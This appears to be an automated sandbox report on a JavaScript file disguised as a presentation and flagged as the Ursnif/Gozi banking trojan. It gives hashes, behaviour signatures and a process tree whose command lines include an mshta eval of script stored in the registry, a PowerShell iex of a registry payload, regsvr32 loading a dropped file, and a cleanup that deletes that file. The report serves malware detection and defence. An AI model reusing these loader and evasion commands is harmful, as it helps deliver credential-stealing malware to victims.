Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10_x64
  • resource
    win10v200410
  • submitted
    17-04-2020 15:20

General

  • Target

    open_presentation_g8l.js

  • Size

    1.4MB

  • MD5

    58da4d0d9bdde0fcecd9d244ced71cc5

  • SHA1

    15122a24648096af45215fa4bfa55f36a432088b

  • SHA256

    e8d7ff11016b3a8f8b3c3e07b3895ff9e9d286aaf45bcc41907b701d7af1bd85

  • SHA512

    346233e19159d7228d1905b645d4b7d6682230f3cccdce04284f1433d2d935c57c6d332364b65334edc374de0aab2c7451dde1448e7c59fc026a0e0b0567230f

Malware Config

Signatures

  • Loads dropped DLL 1 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Ursnif, Dreambot

    Ursnif is a variant of the Gozi IFSB with more capabilities.

  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of WriteProcessMemory 49 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious behavior: EnumeratesProcesses 1276 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Makes http(s) request 17 IoCs

    Contacts server via http/https, possibly for C2 communication.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks whether UAC is enabled 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 35 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetThreadContext
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    • Suspicious behavior: EnumeratesProcesses
    PID:2992
    • C:\Windows\system32\wscript.exe
      wscript.exe C:\Users\Admin\AppData\Local\Temp\open_presentation_g8l.js
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4076
      • C:\Windows\System32\regsvr32.exe
        "C:\Windows\System32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\\lymCsi.txt
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1460
        • C:\Windows\SysWOW64\regsvr32.exe
          C:\Users\Admin\AppData\Local\Temp\\lymCsi.txt
          4⤵
          • Loads dropped DLL
          PID:3388
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\786D016B-7752-6A8D-C12C-9B3E8520FF52\\Apdsprov'));if(!window.flag)close()</script>"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3840
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\786D016B-7752-6A8D-C12C-9B3E8520FF52").Assioker))
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetThreadContext
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        • Suspicious behavior: EnumeratesProcesses
        PID:3892
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zkftt52b\zkftt52b.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:916
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9C4A.tmp" "c:\Users\Admin\AppData\Local\Temp\zkftt52b\CSCCFD34CEAE7D04CB28360BF13C6421431.TMP"
            5⤵
              PID:736
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lxdlcmcs\lxdlcmcs.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1100
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9E1F.tmp" "c:\Users\Admin\AppData\Local\Temp\lxdlcmcs\CSCE12C0745587E40819B1C7B675FC5D35F.TMP"
              5⤵
                PID:1192
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\lymCsi.txt"
          2⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:1656
          • C:\Windows\system32\PING.EXE
            ping localhost -n 5
            3⤵
            • Runs ping.exe
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            PID:2128
        • C:\Windows\system32\cmd.exe
          cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\65A4.bi1"
          2⤵
            PID:2880
            • C:\Windows\system32\nslookup.exe
              nslookup myip.opendns.com resolver1.opendns.com
              3⤵
                PID:3196
            • C:\Windows\system32\cmd.exe
              cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\6540.bi1"
              2⤵
                PID:2884
                • C:\Windows\system32\nslookup.exe
                  nslookup myip.opendns.com resolver1.opendns.com
                  3⤵
                    PID:3708
                • C:\Windows\system32\cmd.exe
                  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6540.bi1"
                  2⤵
                    PID:2572
                  • C:\Windows\system32\cmd.exe
                    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\65A4.bi1"
                    2⤵
                      PID:3384
                    • C:\Program Files\Windows Mail\WinMail.exe
                      "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
                      2⤵
                        PID:3972
                    • C:\Windows\System32\RuntimeBroker.exe
                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                      1⤵
                        PID:3432
                      • C:\Program Files\Internet Explorer\iexplore.exe
                        "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                        1⤵
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of WriteProcessMemory
                        • Suspicious use of SetWindowsHookEx
                        • Checks whether UAC is enabled
                        • Modifies Internet Explorer settings
                        PID:4088
                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4088 CREDAT:82945 /prefetch:2
                          2⤵
                          • Suspicious use of SetWindowsHookEx
                          • Checks whether UAC is enabled
                          • Modifies Internet Explorer settings
                          PID:2560
                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4088 CREDAT:82950 /prefetch:2
                          2⤵
                          • Suspicious use of SetWindowsHookEx
                          • Checks whether UAC is enabled
                          • Modifies Internet Explorer settings
                          PID:3608

                      Network

                      MITRE ATT&CK Enterprise v6

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203

                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203

                      • C:\Users\Admin\AppData\Local\Temp\6540.bi1

                      • C:\Users\Admin\AppData\Local\Temp\6540.bi1

                      • C:\Users\Admin\AppData\Local\Temp\65A4.bi1

                      • C:\Users\Admin\AppData\Local\Temp\65A4.bi1

                      • C:\Users\Admin\AppData\Local\Temp\RES9C4A.tmp

                      • C:\Users\Admin\AppData\Local\Temp\RES9E1F.tmp

                      • C:\Users\Admin\AppData\Local\Temp\lxdlcmcs\lxdlcmcs.dll

                      • C:\Users\Admin\AppData\Local\Temp\lymCsi.txt

                      • C:\Users\Admin\AppData\Local\Temp\zkftt52b\zkftt52b.dll

                      • \??\c:\Users\Admin\AppData\Local\Temp\lxdlcmcs\CSCE12C0745587E40819B1C7B675FC5D35F.TMP

                      • \??\c:\Users\Admin\AppData\Local\Temp\lxdlcmcs\lxdlcmcs.0.cs

                      • \??\c:\Users\Admin\AppData\Local\Temp\lxdlcmcs\lxdlcmcs.cmdline

                      • \??\c:\Users\Admin\AppData\Local\Temp\zkftt52b\CSCCFD34CEAE7D04CB28360BF13C6421431.TMP

                      • \??\c:\Users\Admin\AppData\Local\Temp\zkftt52b\zkftt52b.0.cs

                      • \??\c:\Users\Admin\AppData\Local\Temp\zkftt52b\zkftt52b.cmdline

                      • \Users\Admin\AppData\Local\Temp\lymCsi.txt

                      • memory/1656-21-0x0000026404E20000-0x0000026404ED1000-memory.dmp

                        Filesize

                        708KB

                      • memory/1656-18-0x0000026402AD0000-0x0000026402AD1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2128-20-0x0000026F0BD80000-0x0000026F0BD81000-memory.dmp

                        Filesize

                        4KB

                      • memory/2992-19-0x00000000060D0000-0x0000000006181000-memory.dmp

                        Filesize

                        708KB

                      • memory/2992-17-0x00000000051F0000-0x00000000052A1000-memory.dmp

                        Filesize

                        708KB

                      • memory/2992-15-0x00000000051F0000-0x00000000052A1000-memory.dmp

                        Filesize

                        708KB

                      • memory/2992-12-0x0000000000740000-0x0000000000741000-memory.dmp

                        Filesize

                        4KB

                      • memory/3432-14-0x0000029621900000-0x0000029621901000-memory.dmp

                        Filesize

                        4KB

                      • memory/3892-13-0x000002769E680000-0x000002769E731000-memory.dmp

                        Filesize

                        708KB

                      • memory/3972-28-0x000002372C010000-0x000002372C011000-memory.dmp

                        Filesize

                        4KB

                      • memory/4088-16-0x00000192BE320000-0x00000192BE321000-memory.dmp

                        Filesize

                        4KB